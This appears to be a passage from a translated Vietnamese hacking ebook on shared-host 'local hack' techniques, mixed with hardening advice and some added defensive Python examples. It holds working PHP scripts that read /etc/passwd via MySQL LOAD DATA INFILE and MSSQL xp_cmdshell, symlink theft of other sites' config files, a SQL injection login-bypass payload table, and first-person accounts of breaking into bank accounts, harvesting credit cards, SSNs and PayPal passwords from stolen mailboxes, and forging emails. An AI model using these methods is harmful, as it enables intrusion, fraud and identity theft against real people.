If Safe mode is ON and local access is difficult, we need to know about safe mode bypass bugs. These depend on the PHP version and on whether the usable functions are banned or not. If a PHP safe mode bypass doesn't work we can use LOAD DATA LOCAL INFILE, and Yen has already written an article about that.
If none of the above works, we turn to whether it is possible to get root - take control of the server; this depends on the OS kernel and on whether the software installed on the server has overflow bugs... In short, once we have a shell, everyone has their own way depending on their ability.
--> How to fix?
To avoid the flaws above you must update software and configure correctly (I will go into detail in another article).
- Turn safe mode ON
- Upgrade PHP to the latest version
- In php.ini, ban the sensitive functions + the functions that can bypass safe mode (this requires the admin to keep up with the news)
- For virtual hosts the open_basedir parameter is very important; it must be set to each site's web directory
- CHMOD carefully (how to CHMOD is something to read up on)
- Upload forms must filter files...
- In my.conf add the line set-variable=local-infile=0 to avoid the LOAD DATA LOCAL INFILE flaw
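The php.ini items in the fix list above can be checked mechanically. The following is an added example, not code from the ebook or from the article's author: a small audit that parses a php.ini text and reports which of those recommendations are not met. The two configurations are constructed, the MUST_DISABLE set is taken from the functions this chapter names, and allow_url_include is a real PHP directive I added because the list mentions file inclusion.

```python
"""Audit a php.ini against the hardening list above: dangerous functions
disabled, open_basedir set, no remote includes, safe_mode on older PHP.
Added example, not code from the ebook; both ini texts are constructed."""

# Functions the chapter's server list disables, plus the ones its symlink and
# shell sections rely on.  Any one still enabled is reported.
MUST_DISABLE = {
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "pcntl_exec", "symlink", "dl",
}


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: drops ';' comments and [sections], keeps
    key = value pairs, strips surrounding quotes.  Assumption: one setting per
    line and no ';' inside values."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip("\"'")
    return settings


def is_on(value: str) -> bool:
    """php.ini booleans: 1/On/True/Yes are true, everything else false."""
    return value.strip().lower() in {"1", "on", "true", "yes"}


def audit(ini_text: str, php_version=None):
    """Return a list of findings; an empty list means every check passed.
    php_version is an (major, minor, patch) tuple or None if unknown."""
    s = parse_php_ini(ini_text)
    findings = []
    disabled = {f.strip().lower() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(MUST_DISABLE - disabled)
    if missing:
        findings.append("disable_functions leaves enabled: " + ", ".join(missing))
    if not s.get("open_basedir"):
        findings.append("open_basedir is unset: scripts may read other sites' directories")
    if is_on(s.get("allow_url_include", "0")):
        findings.append("allow_url_include is On: remote file inclusion is possible")
    # safe_mode was removed in PHP 5.4, so the list's "turn it on" only applies before that.
    if php_version is not None and php_version < (5, 4) and not is_on(s.get("safe_mode", "0")):
        findings.append("safe_mode is Off on a pre-5.4 PHP")
    return findings


WEAK_INI = """; constructed weak configuration
[PHP]
safe_mode = Off
disable_functions =
open_basedir =
allow_url_include = On
"""

HARDENED_INI = """; constructed hardened configuration
[PHP]
safe_mode = On
disable_functions = phpinfo,system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec,symlink,dl,show_source
open_basedir = "/home/site/public_html/:/tmp/"
allow_url_include = Off
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini, php_version=(5, 2, 10)) or ["ok"])
```

Run it against each virtual host's effective php.ini rather than the global one, since per-site overrides are where open_basedir is most often left empty.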
Windows local:
Finding vulnerable sites is basically the same as above, with only the programming language differing, and that aspect deserves closer attention.
Local access is possible in these cases: poor permission assignment (usually a shared group, or a group whose permissions were set carelessly), or the server hasn't blocked command execution. All shells that run on Windows share one trait: they use FSO (File System Object) - if this is handled carefully and cmd.exe is moved away, there is no way to run cmd.
Not to mention that antivirus programs are very sensitive to FSO, so it is easily detected.
--> How to fix?
Good permission assignment: it is best to use Windows 2003 server, with each site running in its own pool, although that uses more resources. The account running each site's web is separate, and the account running ASP.NET differs from the one running asp, php,... Setting permissions is extremely important; to do it well, read more documentation and work through Microsoft's security checklists. Note: don't use the Default pool to run sites. Dedicated servers often have this flaw because their admins only install things so that they run, while on the other hand a dedicated server usually runs just a few sites. That is exactly where the danger lies: if a dedicated server is attacked, the chance of losing control and losing a lot of data is very high.
FTP local:
This sounds odd, but the exploit is extremely simple; I use my own site as the example.

In the picture you can see that in the FTP session above I logged in with my own FTP account, yet I can get into all the other FTP accounts on the same server.
So where is the flaw? It can come from 2 possibilities:
- The Fix Home dir parameter (not clearly named) is not set
- All FTP users share a group and that group has rights over every member account's directories.
--> How to fix? From what I presented above, you already know how to fix it.
I wrote this article as a summary; I didn't include illustrations for the 2 parts above because they are quite common and there are already many illustrated articles.

Hieupc's experience with LocalHack:
- Nowadays when hacking locally, most servers have safe mode ON and Disable functions: phpinfo, lynx, proc_open, symlink, readlink, wget, system, exec, shell_exec, passthru, pcntl_exec, proc_close, proc_get_status, prus, proc_nice, proc_terminate, popen, pclose, virtual, openlog, escapeshellcmd, escapeshellarg, show_source, dl, chgrp, chown, so there is nothing we can do. An example of such a server is in the picture below:
This is the case with Safe Mode OFF:
- PHP version 5.2.10 as in the picture is still very hard to hack locally today, but on lower versions we can still go local with: Symlink, using readfile("web directory/user/home/public_html/link file"); . We can also cat a file via MySQL or MSSQL if you have a MySQL or MSSQL user in hand, on the same server of course.
Example: readfile("/etc/passwd"); in the R57 shell
Cat a file via mysql:
<?php
// Connect as a MySQL user on the same server, then pull the file in with LOAD DATA INFILE.
$port ="3306";
$user ="root";
$pass ="";
$database ="test";
$file ="/etc/passwd";
$db =@mysql_connect('localhost:'.$port,$user,$pass);
@mysql_select_db($database,$db);
// Scratch table that receives the file contents
$sql ="DROP TABLE IF EXISTS temp_vniss_test;";
@mysql_query($sql);
$sql ="CREATE TABLE `temp_vniss_test` ( `file` LONGBLOB NOT NULL );";
@mysql_query($sql);
// The MySQL server process reads the file, not the PHP script
$sql ="LOAD DATA INFILE \"".$file."\" INTO TABLE temp_vniss_test;";
@mysql_query($sql);
$sql ="SELECT * FROM temp_vniss_test;";
$r =@mysql_query($sql);
while(($r_sql =@mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
// Clean up the scratch table
$sql ="DROP TABLE IF EXISTS temp_vniss_test;";
@mysql_query($sql);
@mysql_close($db);
?>

Similarly with mssql:
<?php
$port ="1433";
$user ="root";
$pass ="";
$database ="test";
$file ="/etc/passwd";

$db =@mssql_connect('localhost,'.$port,$user,$pass);
@mssql_select_db($database,$db);
@mssql_query("drop table temp_vniss_test",$db);
@mssql_query("create table temp_vniss_test ( string VARCHAR (500) NULL)",$db);
// $file is handed to xp_cmdshell as the command line to run; its output lands in the table
@mssql_query("insert into temp_vniss_test EXEC master.dbo.xp_cmdshell '".$file."'",$db);
$res =mssql_query("select * from temp_vniss_test",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table temp_vniss_test",$db);
@mssql_close($db);
?>

- There is a way to use a shell script on the server even when the PHP version is 5.2.10 or newer: if you have a host on that server with an FTP username + password, things get simpler, since you only need to upload the shell and start exploiting via Symlink. Symlink as follows:
Say the web directory looks like:
/home/hieu/domains/hieu.net/public_html/
The web directory of the site we want to symlink to is:
/home/hieupc/domains/hieupc.com/public_html/
Now let's exploit it by pulling config.php over to our host:
ln -s /home/hieupc/domains/hieupc.com/public_html/config.php 12345.txt
The file we symlinked is config.php, linked to 12345.txt on our host.
Now let's view it:
http://hieupc.com/12345.txt
The result shown is the config.php of the site we are attacking:

Through this method we can do quite a lot, such as getting the MySQL password from the site's config file, and from there continue exploiting to take over that site's admin. This method is called local hack through MySQL.
- If the website has an LFI or RFI flaw we can use it to put a shell in and exploit as usual. Learn more about this kind of hack at vnbrain.net or hcegroup.net
- You can also get root through vulnerable Linux kernels the server hasn't upgraded. Check milw0rm.com for updates.
- If you have a target website you want to hack but don't have a host on that same server, you must Reverse IP to see the sites on that server, and from there hack by escalation: try to find flaws in the sites on that server and hack them in various ways such as SQL Injection, File Inclusion Attack, RFI, XSS to get into a site's admin panel, then try to get a shell uploaded. Once we have a shell on the same server as the site we want to hack, we apply our local hack skills and attack + deface if desired. We can also apply this to hack shops via localhack. But big shops mostly use dedicated servers, so getting in is a problem in itself.
- If the Admin password is an MD5 and you can't be bothered to crack it, convert the password 123456 to MD5 and overwrite the stored MD5 with it (of course, you must already be inside that site's MySQL to do this). We can also change the email address and then use forgot password (hieupc often uses this on VBB or IBF to reset the admin's password). Then try logging in.

More about CHMOD:
One of the mistakes admins often make is incorrect CHMOD; because of it, the chance of that site being attacked is far higher than for sites with correct CHMOD, especially on a shared server during a local hack. Of course, this flaw alone can't be attacked directly, since it isn't an attackable flaw in itself. It is easily exploited when a directory is given write and execute permission at the same time, usually directories that allow uploads. A hacker can then easily run a shell in that directory. Another case is local hack: CHMOD 777 is a disaster, because it means that whole directory is under the attacker's control. And I'm sure any hacker doing a local hack who sees the bright green (the usual color for directories) of a 777 directory beams and thinks this admin is a real "chicken".
Why do I write this article? Because many admins and coders don't know what CHMOD is, or understand it only superficially. They only care that the website runs, full stop. Many even naively believe that write permission is the same as 777. Completely wrong!!! So what is CHMOD?
CHMOD - it is a concept concerning files and directories, whose job is to tell the server who may do what with a given file or directory. Mainly CHMOD sets permissions such as the right to read and write a file (or directory), and the right to carry out a particular action.
Since most servers run on UNIX systems, we will study how CHMOD is done for these servers.
On UNIX systems, users are divided into 3 groups: "user" (the direct owner of the files), "group" (members of the group the file's owner belongs to) and "world" (everything else). When you connect to the server, it determines which group you belong to. For example, if you connect to the server by FTP and log in with a member username, the server places you in the "user" group. Other members who connect by FTP belong to "group". When someone visits your site with a web browser, they are placed in "world".
After the group is determined, the user is granted certain permissions on a given file or directory. Specifically, the user may read, write, or create (or delete) files. To view a directory, the directory must allow that viewing. To view a directory's contents, the files and subdirectories inside it must also be marked "readable". Creating a new file or directory inside that directory requires write permission. In short, to do any of the above, the directory must be given "read permission" and "execute permission".
Now let's practise...
As noted above, there are 3 groups of users and 3 "permissions" on files and directories. To assign permissions to a given group, the convention is to use numeric symbols as follows:
4 = read
2 = write
1 = execute
By simply adding these numbers you can express every possible "combination" of permissions. For example, 3 (2+1) - write and execute on a file (or directory); 5 (4+1) - read and execute; 6 (4+2) - read and write; 7 (4+2+1) - read, write and execute. In short there are 7 options:
7 = read, write & execute
6 = read & write
5 = read & execute
4 = read
3 = write & execute
2 = write
1 = execute
A CHMOD value usually has 3 digits: the first digit is the permission granted to the "user" (that is, you). The second digit is the permission for users in "group", and the third digit is for "world".
Most modern FTP programs support CHMOD in the form described above (for example, the most powerful FTP tool today is WS_FTP).
But it does no harm to also know the UNIX system commands. The UNIX "chmod" command has 2 modes: absolute (numbers) and symbolic (letters).
In absolute mode (numbers), the 3-digit combination described above expresses the permissions.
In symbolic mode, we encounter the following symbols:
"r" - read permission
"w" - write permission
"x" - execute permission
In addition:
"u" - for user
"g" - for group
"o" - for other (world)
"a" - for all
Examples: 755 = chmod u=rwx,go=rx filename; 644 = chmod u=rw,go=r filename; 600 = chmod u=rw,go= filename; 444 = chmod a=r filename.
Below is a table of the combinations most common on hosting:

Permissions (U G W)      Command       Description
rwx r-x r-x              chmod 755     For directories, CGI scripts and other executable files
rw- r-- r--              chmod 644     For ordinary files
rw- --- ---              chmod 600     Hide files from everyone except you and your scripts
U = user; G = group; W = world; r = read; w = write; x = execute; - = no permission
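As an added example, not part of the original ebook, the following Python script implements the numeric and symbolic notation described above (converting between "rwxr-xr-x" and 755 in both directions) and audits a constructed directory listing for the group- and world-writable cases the text warns about. The sample paths and modes are made up for the demonstration; the function names are this example's own.

```python
import stat

_BITS = {"r": 4, "w": 2, "x": 1}   # the numeric values from the list above


def symbolic_to_mode(sym):
    """'rwxr-xr-x' -> 0o755; the three triplets are user, group, world."""
    if len(sym) != 9:
        raise ValueError("symbolic mode must be 9 characters: %r" % sym)
    mode = 0
    for i, ch in enumerate(sym):
        if ch == "-":
            continue
        if ch != "rwx"[i % 3]:
            raise ValueError("unexpected %r at position %d in %r" % (ch, i, sym))
        # triplet 0 is shifted by 6 (user), 1 by 3 (group), 2 by 0 (world)
        mode |= _BITS[ch] << (3 * (2 - i // 3))
    return mode


def mode_to_symbolic(mode):
    """0o644 -> 'rw-r--r--'."""
    out = []
    for shift in (6, 3, 0):            # user, group, world
        t = (mode >> shift) & 0o7
        out.append("r" if t & 4 else "-")
        out.append("w" if t & 2 else "-")
        out.append("x" if t & 1 else "-")
    return "".join(out)


def audit_listing(entries):
    """entries: iterable of (path, st_mode) as os.stat() would report.
    Flags anything writable by 'world' or 'group': the 777 / 666 settings
    the text warns about, which let any other account on the host write."""
    findings = []
    for path, st_mode in entries:
        perm = stat.S_IMODE(st_mode)        # strip the file-type bits
        if perm & stat.S_IWOTH:
            findings.append((path, "world-writable %o" % perm))
        elif perm & stat.S_IWGRP:
            findings.append((path, "group-writable %o" % perm))
    return findings


# Constructed sample listing, not taken from any real server.
SAMPLE_LISTING = [
    ("/home/site/public_html", 0o40777),
    ("/home/site/public_html/index.php", 0o100644),
    ("/home/site/public_html/cgi-bin/form.cgi", 0o100755),
    ("/home/site/public_html/uploads", 0o40775),
    ("/home/site/public_html/config.php", 0o100600),
]

if __name__ == "__main__":
    for path, st_mode in SAMPLE_LISTING:
        print("%s %o %s" % (mode_to_symbolic(st_mode), stat.S_IMODE(st_mode), path))
    print(audit_listing(SAMPLE_LISTING))
```

On a real host the same audit can be fed from os.walk() and os.lstat(); the check deliberately looks at the write bits only, since the table above shows that read and execute for group and world are normal for directories and scripts.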
More on login bypass:
Sometimes when you visit a site you see a login form... and what if you want to log in with administrator rights? If you know the user and password you can just log in, right? But what if you don't know them? Then login bypass helps you log in there with the highest privileges... that is the basic idea. Here are some values you can submit to see whether the login can be bypassed:

Username             Password
' or 1=1--           ' or 1=1--
" or 1=1--           " or 1=1--
or 1=1--             or 1=1--
' or 'a'='a          ' or 'a'='a
" or "a"="a          " or "a"="a
') or ('a'='a        ') or ('a'='a
Below is an article by boyxintin of Hcegroup.net:
Let's look a little more at the technology.
Today's applications, whether web applications or Windows applications, use a 3-layer model: the presentation layer, the processing layer and the database layer.
- The presentation layer is what the user sees, such as a web page or the Yahoo program you can see.
- The processing layer is the code that handles events; for example, when you enter user + password in Yahoo Messenger and press Enter, what happens? This layer carries out those events.
- The database layer stores information, such as customer account information, administrator information... depending on what the application is for. The database lives in a database management system (MySQL, SQL Server, Oracle, MS Access...).
Example:
hxxp://daleosterloh.com/bug/index.php
At this point the processing layer runs queries against the database to see whether the information you entered is correct, and then executes its scripts.

Why can it be bypassed?
To bypass it properly, first let me insist that you must understand what is written in the processing layer. Those who have read hieupc's ebook may know a few bypass keywords; all of those keywords came from attackers who attacked systems, read the source and published them, and because sites often share the same source (bought from somewhere) one falls and they all fall.

Now I will analyse the code above so you understand clearly why it can be bypassed.
After the presentation layer sends the data, in the processing part we have 2 variables, $username + $password, which hold the user and password the user entered.
Skip the fluff and focus on the query:
select * from users where username='".$username."' and password='".$password."'
and the if statement:
if($list_rows > 0)
{
header("Location: manage.php?hcegroup=1");
}
else
{
header("Location: error.php");
}
It means:

Query: select all attributes (username, password...) from table users where username = the entered user and password = the entered password.

if: if the number of rows returned > 0, let the user in, otherwise refuse.

So far I see no bug; the login problem is: look in the database for that user + password; if the count is greater than 0 it exists, so let them in, otherwise deny.
To explain why ($list_rows > 0) is used: usually a user appears only once in the database, so if it is found the value is 1; some programmers write > 0 instead of = 1.

Now enter user = abcd and password = ' or '1'='1 in place of the red part above. The query becomes:
select * from users where user ='abcd' and password ='' or '1'='1'
The statement is simple to read: it no longer matters what the user or the password is, because '1'='1' is an obviously true condition, so every user in the table is selected and the number of users found is always greater than 0 (unless the database has no users at all). Now you pass the if statement and reach the admin page. If you understood what I wrote above you can see that it need not be '1'='1'; it could be '1'<>'0' or 1>0 or 'a'='a or 'a'<>'b, as long as a true condition is inserted into the query, so there are countless ways to bypass.
A further explanation about the ' and -- characters used when bypassing; when I first read about this I wondered too. Example: bypass the login form above with the password: ' or '1'='1
Why is there a ' at the start, and why is there no ' after the final 1?
Look at the select statement (ignore the " characters):
select * from users where user ='' and password=''

The user & password you supply are placed between two ' characters, so to keep the syntax correct you must write it like this:
select * from users where user ='abcd' and password='' or '1'='1'
It is just a matter of closing the quotes so that SQL does not treat the values you inject as strings.

In addition, -- is a one-line comment; when you add --, the characters after it no longer mean anything to SQL.
For example, for the password above I could use the password: ' or '1'='1'-- . Then the statement is:
select * from users where user ='abcd' and password='' or '1'='1'--'
Now the ' after -- has no effect, so the statement produces no error.
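The following Python script is an added illustration of boyxintin's analysis, not code from the original article (which is PHP; the query semantics are the same). It builds a constructed in-memory SQLite users table (sample rows, not real credentials), runs the article's concatenated query against it, and runs the same query with bound parameters, so the row counts for the ' or '1'='1 and ' or '1'='1'-- inputs can be compared side by side; the row count is what the article's if ($list_rows > 0) test looks at. The names make_db, login_concat, login_bound and compare are this example's own.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table; the rows are sample data, not real."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "sample-admin-pass"), ("bob", "sample-bob-pass")],
    )
    return conn


def login_concat(conn, username, password):
    """The pattern from the article: user input glued into the SQL string.
    Returns the number of matching rows, which the article's `if` compares to 0.
    The quote in the input closes the string literal and the rest becomes SQL."""
    sql = ("SELECT * FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return len(conn.execute(sql).fetchall())


def login_bound(conn, username, password):
    """Same query with bound parameters: the driver sends the values
    separately from the statement, so quote characters in them are data,
    never syntax, and no row matches unless the stored pair really matches."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return len(conn.execute(sql, (username, password)).fetchall())


def compare(username, password):
    """Run both versions against the same data; returns (concat_rows, bound_rows)."""
    conn = make_db()
    return login_concat(conn, username, password), login_bound(conn, username, password)


if __name__ == "__main__":
    for creds in [("bob", "sample-bob-pass"),
                  ("abcd", "' or '1'='1"),
                  ("abcd", "' or '1'='1'--")]:
        print(creds, "->", compare(*creds))
```

The parameterised version returns 0 rows for both bypass inputs and 1 row for the genuine pair, which is exactly the behaviour the article's if statement assumes it is getting from the concatenated query.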
III. How To Get This Important Information
1. How to find the admin link:
Here is a funny story: Hieupc has many times found the admin link by chatting with or emailing the admin to ask what the site's admin link is. Do you believe it? The truth is that this method works, and what matters is knowing how to talk and giving clear, logical-looking evidence. Below is a Yahoo chat asking for the admin link of a site where hieupc had searched forever without finding the admin link to upload a shell; Hieupc already had the admin user and password through a SQL Injection bug. Look at the picture below and you will understand:
[Screenshot of the Yahoo chat; not reproduced here]
In the end the admin link of the site Hieupc was attacking was: http://www.site.com/ecp, no wonder it could not be found.
Once you have the admin link, upload the shell; no need to waste effort scanning for the link and then groping around. This method is somewhat risky, but what matters is your creativity, logic and composure.
Note: try to get the email or chat nickname of the webmaster or the person who designed the site. Remember to check what relationship the site has with the person you are going to contact about the admin link.
Hieupc has also emailed to ask for the admin link and succeeded; I wanted to find that email to show everyone, but cannot find it now.
2. Getting the important information we need:
We usually take important information such as: CC, hosting, bank accounts, web accounts, iTunes, eBay, PayPal... There is a lot of this in email lists; to obtain an email list + passwords you obviously have to hack, by exploiting bugs such as SQL Injection. Here is the evidence:
Once hieupc hacked a US bank account but was asked security questions; although I had the email user and password and searched the mailbox all afternoon, I could not find the answers. So Hieupc thought of faking an email with the following content; look at the picture and you will understand (to this day his email password has not changed; I logged into his email and took a screenshot):
[Screenshot of the faked email; not reproduced here]
So I had what I needed. Log into the bank account. Again this takes logic and a bit of luck.
Hieupc has some other methods but stops here; Hieupc once turned a shop of "CC NON" into a shop with FULL INFO including SSN, DOB, PIN and even scanned credit cards sent by email, also through these logical and creative tricks. I only hint at it so you work it out yourselves, since this is very much phishing or scamming in nature.
- How best to get information from an email list you have. Usually your email list already contains the passwords of the emails, so you log into emails of the forms gmail.com, yahoo.com and hotmail.com, including live.com or msn.com. Then you may find important information such as: CC, hosting, bank accounts, web accounts...
You just use the built-in email search (almost all email services have one); for example, if Hieupc needs to find a bank account, type: bank and many emails related to the keyword bank will appear. From there you know which banks the email owner uses; then try the email's username and password to log in; if that fails, search for: user and then: password, collect all usernames and passwords into Notepad and try them in turn. Do the same for the other information we need, such as: SSN, DOB, PayPal, iTunes (for PayPal you do not need to know how many characters the email password has; just log into the email and search for PayPal to see whether the owner uses PayPal; if so, search for password, pick the ones longer than 8 characters, and finally try them to log in).
An example of a BOA bank account hieupc hacked that has a balance (a hacked bank account has a balance, while a bank account registered with fake full info has none, right?):
[Screenshot of the bank account; not reproduced here]
Note: attachments of type .doc, .xls or .pdf belonging to the email owner often contain their important information. Many times hieupc has obtained information such as credit cards, bank accounts, passports and PayPal from an attachment the owner saved in the email. Example of a document file containing bank and CC information:
[Screenshot of the document; not reproduced here]
Hieupc usually checks @yahoo.com emails to hack bank accounts and succeeds very often. In Yahoo you can search document files very quickly as follows: switch to the Mail Classic view and then choose My Attachments and they are displayed right away.
IV. Exploiting By Tools, Scripts:
1. Shell Script:
- There are many shell scripts nowadays, but hieupc finds that only r57.php, c99.php and kshell.aspx are the best.
Download the shell script bundle here:
http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar
http://www.guru.net.vn/kshell_1.2.zip
2. Here are the hacking tools hieupc uses most:
- Scanning tools: Acunetix Web Vulnerability Scanner 6, Advanced IP Scanner 1.5, Network Monitor.
- Sniffer tools: EffeTech HTTP Sniffer, Packet Sniffer, Password Sniffer, MSN Sniffer
- Tools supporting SQL Injection: AKD-injection 3, Absinthe 1.4.1, URLScan v3.1, Scrawlr, Microsoft Source Code Analyzer, BAKOs SQL_Injection_Scanner_v2.2, SQL INJECTOR V2.0.
- Database tools: MySQL, MSSQL Server, RazorSQL
- Other supporting tools: ActivePerl, ActivePython, PHP, CGI, ASP, Metasploit 3, XN Hashing Tool, Putty, CuteFTP, RemoteDesktop
- A good link on LFI and RFI:
http://www.guru.net.vn/PermaLink,guid,1924e061-6881-453d-a841-5ec94c00591f.aspx
You can search for and download the tools above via google.com.
V. Special Things:
1. How to fix SQL Injection and other remedies:
PHP usually has 2 forms of this bug: the first is visible, called ordinary SQL injection; the second cannot be seen even though the site really is vulnerable, called Blind SQL injection.

Usually, to check for the first form we add a ' (quote) after addresses of the form user.php?id=1 or user.php?id= (note: there are many keywords other than ?id= for testing SQL bugs, e.g. ?nid= and so on).

Example: http://hieupc.net/user.php?id=1' and http://hieupc.net/user.php?id=' both work.

The second form is harder, and you can easily suppress the error messages sent by the server by putting the @ character in front of the SQL call.
Example, the original code:
$id = $_GET['id'];
mysql_query("SELECT * FROM xviet.net WHERE id=$id");
With the error suppressed:
$id = $_GET['id'];
@mysql_query("SELECT * FROM xviet.net WHERE id=$id");
From the hacker's side this makes the bug hard to find, so if you are not clear about SQL injection you can add @ in front of the statement as in the example above to hide the error.

Or use:
error_reporting(0);
at the top of the PHP script to hide errors.
If the site to be checked is one where you are the webmaster, you can do the following:
$id = $_GET['id'];
print $id; // output the raw value to see what the script received
mysql_query("SELECT * FROM xviet.net WHERE id=$id");
With the detection URL http://hieupc.com/user.php?id=' the variable $id will hold ' (a quote) if the site is vulnerable, and the print statement in the code above outputs the value of $id; if you see the quote, the site is vulnerable; if not, check once more, because the code above has not been fixed at all.
Also based on the example above, you can use the intval() function to remedy this bug, for example:
Unfixed:
$id = $_GET['id'];
mysql_query("SELECT * FROM xviet.net WHERE id=$id");

Fixed:
$id = intval($_GET['id']); // only an integer can reach the query
mysql_query("SELECT * FROM xviet.net WHERE id=$id");
In intval, int means integer and val means value, so the value of $id must be an integer; this way a hacker cannot inject into or exploit your SQL.
Article based on Anti PHP-SQL Injection from vncoder.net.
SQL Injection:
- Most SQL Injection bugs are due to an incorrect SQL statement, or to the user making the SQL statement incorrect so that it no longer does what it should. For example, we have a login-check script like this:

Code (php)
<?php
// Commands that connect to the SQL database, etc.
$username = $_POST['username']; // Take user and password from the form
$password = $_POST['password'];
$result = mysql_query("SELECT * FROM users WHERE user =\"$username\" AND password =\"$password\"");
if (mysql_num_rows($result) > 0) {
// Login successful
}
else {
// Wrong username or password
}
// .......
?>
- The script above is a very simple login script that checks the username and password through a SQL statement. The original SQL statement is:
Quote:
SELECT * FROM users WHERE user ="$username" AND password ="$password"
- However, this is a huge SQL Injection bug: if the user enters the User variable as " OR 1 OR user="

- the SQL statement becomes:
SELECT * FROM users WHERE user ="" OR 1 OR user="" AND password ="$password"
- The result is every user in the database, and of course this is an invalid login (the password variable can also be used to create a SQL Injection). In fact the bug above is due to the $username variable; it can be fixed by checking the user variable first and only then the password variable, or, faster, almost all SQL Injection bugs can be fixed with a single built-in PHP function: addslashes.

- A word about addslashes: this function returns a string with a \ before the characters that need quoting in the database, which are ', ", \ and NUL (\0).

- Signature of addslashes: string addslashes ( string str )

- Thanks to addslashes our SQL statement becomes:
SELECT * FROM users WHERE user ="\" OR 1 OR user=\"" AND password ="$password"
- Now the SQL statement works exactly as intended. Some other SQL Injection bugs can also be fixed this way. Let me repeat that this method only fixes almost all SQL Injection bugs, that is, those caused by PHP variables; for bugs in the SQL statement itself it is of no use. However, with this method and sound SQL statements, I believe you need not worry about SQL Injection.

PHP Injection:

- PHP Injection bugs usually occur in scripts that read files, interact with the system, etc. Here is a typical PHP Injection:

Code (php)
<?php
// ...
readfile($file);
// ...
?>
At first sight there is no bug, but if for some reason the $file variable is not declared, this is a very serious PHP Injection bug.
- Then $file is declared by PHP itself through the Register Globals feature, and the result is that the contents of somescript.php or of any file on the system are output (including the password file, if the hacker digs; then our host is finished).

- Analysing it, $file was declared by the Register Globals feature (the feature that automatically registers variables from GET, POST, COOKIE etc.), and the fix is simply to turn that feature off. Turning it off does not affect PHP much.
Further reading:
Safe Mode = On, its nature and how to deal with it:
What is Safe Mode?
Safe Mode in PHP: a technique often applied by Shared Hosting to strengthen security (against internal attacks, commonly called Local Hack). The technique is not really perfect at the PHP level, and to this day it is still applied in many places. Fortunately, from PHP version 6.0 this feature will be removed and we will no longer need to worry about it.

Determining whether Safe Mode is On or Off
Create a file info.php in your web directory with the following content:

<?php
phpinfo();
?>

Open the path to info.php, e.g.:
http://localhost/info.php
http://yourdomain/info.php
Look for "Loaded Configuration File" to find where the php.ini configuration file is.
Look for "safe_mode" for the current state of Safe Mode (On = enabled, Off = disabled).

Turning off Safe Mode
Case 1: you can administer the server

Locate the php.ini configuration file, open it and set:
safe_mode = Off

Case 2: you are not the server administrator
You can try to turn it off in 1 of 3 ways (provided the server allows overriding the original setting).
- Way 1 - create a "php.ini" file in your web directory with the directive:
safe_mode = Off

- Way 2 - create a ".htaccess" file in your web directory with the directive:
php_flag safe_mode off

- Way 3 - use PHP's ini_set function: put the following line in the configuration file (e.g. globals.php, configuration.php):
ini_set('safe_mode','Off');
The nature of Safe Mode:
Suppose you have a script /home/hieupc/do_some_thing.php with the content:
<?php
// do job-1
// do job-2
// ....
// do job-n
?>

With Safe Mode = On, when you run the do_some_thing.php script above, the server checks who the Owner of do_some_thing.php is.
E.g. "hieupc" or "apache" or some "user-xyz".
If in job-x there is an operation on some file or directory (the directory /opt/lampp/tmp, say), and that file or directory is owned by a different Owner, an error occurs.

Also, when Safe Mode = On many functions may be disabled.
E.g. move_uploaded_file(), mkdir()... So if your *.php script uses one of those functions, an error also occurs.

List of disabled functions: http://vn2.php.net/manual/en/features.safe-mode.functions.php
Preventing SQL Injection attacks:
You want to reduce the opportunity for attackers to insert dangerous SQL into command parameter values.

Many applications build dynamic SQL statements by piecing fragments together into one large string. This approach causes problems with binary data and also increases the chance that an attacker can execute dangerous SQL by hiding it in a parameter value. The malicious code may be used to tamper with information in the database or even to run another application on the server. You can see some examples for database servers at http://www.owasp.org/asac/input_validation/sql.shtml.

To prevent this, you should validate user-supplied input, checking that it has the expected data type, is not unusually long, and so on. The easiest way to do this is to use a parameterized query.
Parameterized queries are used for all stored procedure calls, but you can also use them with dynamic SQL statements. In the latter case, you just take an ordinary SQL statement and replace the dynamic values with parameters (the result looks like the body of a simple stored procedure). Here is a parameterized SQL statement:
INSERT INTO Shippers (CompanyName, Phone) VALUES (@CompanyName, @Phone)
To use this statement, add the corresponding Parameter objects to the Command object (with suitable values). This case needs two parameters (@CompanyName and @Phone). The console application below uses this parameterized query to add a new record to the Shippers table of the Northwind database.


Imports System
Imports System.Data
Imports System.Data.SqlClient

Public Module ParameterizedQuery
    Private ConnectionString As String = "Data Source=localhost;" & _
        "Integrated Security=SSPI;Initial Catalog=Northwind"

    Public Sub Main()
        ' Create the connection and the command.
        Dim Con As New SqlConnection(ConnectionString)
        Dim UpdateSQL As String = "INSERT INTO Shippers " & _
            "(CompanyName, Phone) VALUES (@CompanyName, @Phone)"
        Dim Cmd As New SqlCommand(UpdateSQL, Con)
        ' Add the input parameters.
        Dim Param As SqlParameter = Cmd.Parameters.Add("@CompanyName", _
            SqlDbType.NVarChar, 40)
        Param.Value = "Test Company"
        Param = Cmd.Parameters.Add("@Phone", SqlDbType.NVarChar, 24)
        Param.Value = "(503) 555-9931"
        Try
            ' Execute the command.
            Con.Open()
            Dim Rows As Integer = Cmd.ExecuteNonQuery()
            Console.WriteLine(Rows.ToString() & " row(s) affected.")
        Catch Err As Exception
            Console.WriteLine(Err.ToString())
        Finally
            Con.Close()
        End Try
        Console.ReadLine()
    End Sub
End Module


Some ways to defend against SQL Injection:

